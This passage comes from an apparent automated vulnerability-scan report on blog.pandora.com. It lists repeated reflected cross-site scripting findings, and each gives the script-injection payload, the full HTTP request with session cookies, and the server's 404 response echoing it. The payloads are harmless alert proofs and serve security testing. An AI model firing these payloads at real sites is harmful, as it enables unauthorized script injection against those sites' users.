Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives189bf<script>alert(1)</script>7e15ac1b4e2/2008/05/ was not found on this server.</p>
...[SNIP]...

3.155. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/05/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload df6e5<script>alert(1)</script>6172eb86b30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008df6e5<script>alert(1)</script>6172eb86b30/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008df6e5<script>alert(1)</script>6172eb86b30/05/ was not found on this server.</p>
...[SNIP]...

3.156. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/05/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 150c1<script>alert(1)</script>9c01c9b532d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/05150c1<script>alert(1)</script>9c01c9b532d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/05150c1<script>alert(1)</script>9c01c9b532d/ was not found on this server.</p>
...[SNIP]...

3.157. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/06/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 15eb9<script>alert(1)</script>7a020e9b0eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora15eb9<script>alert(1)</script>7a020e9b0eb/archives/2008/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora15eb9<script>alert(1)</script>7a020e9b0eb/archives/2008/06/ was not found on this server.</p>
...[SNIP]...

3.158. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/06/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec3a9<script>alert(1)</script>a9054eec92c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesec3a9<script>alert(1)</script>a9054eec92c/2008/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesec3a9<script>alert(1)</script>a9054eec92c/2008/06/ was not found on this server.</p>
...[SNIP]...

3.159. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/06/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 46068<script>alert(1)</script>eee473a0b7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200846068<script>alert(1)</script>eee473a0b7a/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200846068<script>alert(1)</script>eee473a0b7a/06/ was not found on this server.</p>
...[SNIP]...

3.160. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/06/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3962<script>alert(1)</script>2bd69b3ec0b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/06c3962<script>alert(1)</script>2bd69b3ec0b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/06c3962<script>alert(1)</script>2bd69b3ec0b/ was not found on this server.</p>
...[SNIP]...

3.161. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47138<script>alert(1)</script>a3f13374191 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora47138<script>alert(1)</script>a3f13374191/archives/2008/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora47138<script>alert(1)</script>a3f13374191/archives/2008/07/ was not found on this server.</p>
...[SNIP]...

3.162. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e4152<script>alert(1)</script>d0196897ba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivese4152<script>alert(1)</script>d0196897ba0/2008/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivese4152<script>alert(1)</script>d0196897ba0/2008/07/ was not found on this server.</p>
...[SNIP]...

3.163. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12ccb<script>alert(1)</script>30223f2cf54 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200812ccb<script>alert(1)</script>30223f2cf54/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200812ccb<script>alert(1)</script>30223f2cf54/07/ was not found on this server.</p>
...[SNIP]...

3.164. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/07/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9e3c<script>alert(1)</script>20dad2bc554 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/07a9e3c<script>alert(1)</script>20dad2bc554/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/07a9e3c<script>alert(1)</script>20dad2bc554/ was not found on this server.</p>
...[SNIP]...

3.165. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56d79<script>alert(1)</script>a4032462556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora56d79<script>alert(1)</script>a4032462556/archives/2008/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora56d79<script>alert(1)</script>a4032462556/archives/2008/08/ was not found on this server.</p>
...[SNIP]...

3.166. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25bf5<script>alert(1)</script>3d971d76d88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives25bf5<script>alert(1)</script>3d971d76d88/2008/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives25bf5<script>alert(1)</script>3d971d76d88/2008/08/ was not found on this server.</p>
...[SNIP]...

3.167. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5abe6<script>alert(1)</script>db42742e74 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20085abe6<script>alert(1)</script>db42742e74/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 348
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20085abe6<script>alert(1)</script>db42742e74/08/ was not found on this server.</p>
...[SNIP]...

3.168. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70934<script>alert(1)</script>e46d04bff1b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/0870934<script>alert(1)</script>e46d04bff1b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/0870934<script>alert(1)</script>e46d04bff1b/ was not found on this server.</p>
...[SNIP]...

3.169. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac95c<script>alert(1)</script>f39701078da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraac95c<script>alert(1)</script>f39701078da/archives/2008/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraac95c<script>alert(1)</script>f39701078da/archives/2008/09/ was not found on this server.</p>
...[SNIP]...

3.170. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb2c5<script>alert(1)</script>2ae1ae68fdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archiveseb2c5<script>alert(1)</script>2ae1ae68fdb/2008/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archiveseb2c5<script>alert(1)</script>2ae1ae68fdb/2008/09/ was not found on this server.</p>
...[SNIP]...

3.171. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e57ea<script>alert(1)</script>aa701cd74e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008e57ea<script>alert(1)</script>aa701cd74e3/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
